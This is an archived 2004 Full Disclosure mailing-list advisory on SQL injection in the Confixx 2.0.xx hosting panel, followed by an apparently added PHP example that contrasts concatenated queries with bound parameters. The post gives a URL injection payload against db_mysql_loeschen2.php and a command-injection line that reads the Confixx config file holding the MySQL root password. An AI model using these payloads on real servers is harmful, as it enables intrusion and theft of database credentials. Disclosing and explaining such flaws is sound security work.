Full Disclosure mailing list archives

Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW


From: checker () mail krefeld schulen net
Date: 9 Mar 2004 09:24:47 -0000

SQL-Injections in Confixx 2.0.xx // reading MySQL Root-PW


include("auth.php");

db_connect($db_host, $db_user, $db_pass);

$id = db_query("select count(datenbank) as mysql from mysql_datenbanken
where kunde = '$PHP_AUTH_USER'");
$werte = db_fetch_array($id);
$mysql = $werte["mysql"];

$id = db_query("select dbname from mysql_datenbanken where kunde =
'$PHP_AUTH_USER' and datenbank = '$db'");
--------------------------------^^^^^^^^^

$db --> unchecked Value

____


/user/db_mysql_loeschen2.php?db=1


SELECT db FROM sqldb WHERE user='$USER' AND db='$formular_wert'

using: ' or 1 or 1='

the SQL query looks like:

SELECT db FROM sqldb WHERE user='$USER' AND db='' or 1 or 1=''


/user/db_mysql_loeschen2.php?db=' or 1 or 1='



______

Confixx Perl Debugger

using:

 ; /bin/cat location_of_Confixx_config_file


to read the config with MySQL Root-PW

_______


wkr

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
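
Added example (not part of the original post and not Confixx code): the simplified query from the post built by string concatenation, next to the same lookup with bound parameters. It runs against an in-memory SQLite database through PDO; the rows, customer names and function names are constructed for illustration.

```php
<?php
// Added example, not Confixx code. Table and column names follow the
// simplified query in the post; the rows and customer names are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE sqldb (user TEXT, db TEXT)");
$pdo->exec("INSERT INTO sqldb VALUES
            ('web1', 'web1_db1'), ('web2', 'web2_db1'), ('web3', 'web3_db1')");

// Pattern shown in the post: the request value is pasted into the SQL text,
// so quote characters in it are parsed as SQL syntax.
function lookup_concat(PDO $pdo, string $user, string $db): array
{
    $sql = "SELECT db FROM sqldb WHERE user='$user' AND db='$db'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the statement text is fixed and the values are bound,
// so the value is only ever compared as data against the db column.
function lookup_bound(PDO $pdo, string $user, string $db): array
{
    $stmt = $pdo->prepare("SELECT db FROM sqldb WHERE user = :user AND db = :db");
    $stmt->execute([':user' => $user, ':db' => $db]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// A normal value, then the value quoted in the post.
$inputs = ["web1_db1", "' or 1 or 1='"];

foreach ($inputs as $value) {
    $concat = lookup_concat($pdo, 'web1', $value);
    $bound  = lookup_bound($pdo, 'web1', $value);
    printf(
        "db=%-18s concat: %d row(s) [%s]  bound: %d row(s) [%s]\n",
        json_encode($value),
        count($concat), implode(', ', $concat),
        count($bound), implode(', ', $bound)
    );
}
```

With the concatenated query, AND binds tighter than OR, so the WHERE clause is true for every row and the customer filter on user no longer restricts the result; the bound query matches only a row whose db column equals the literal string.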

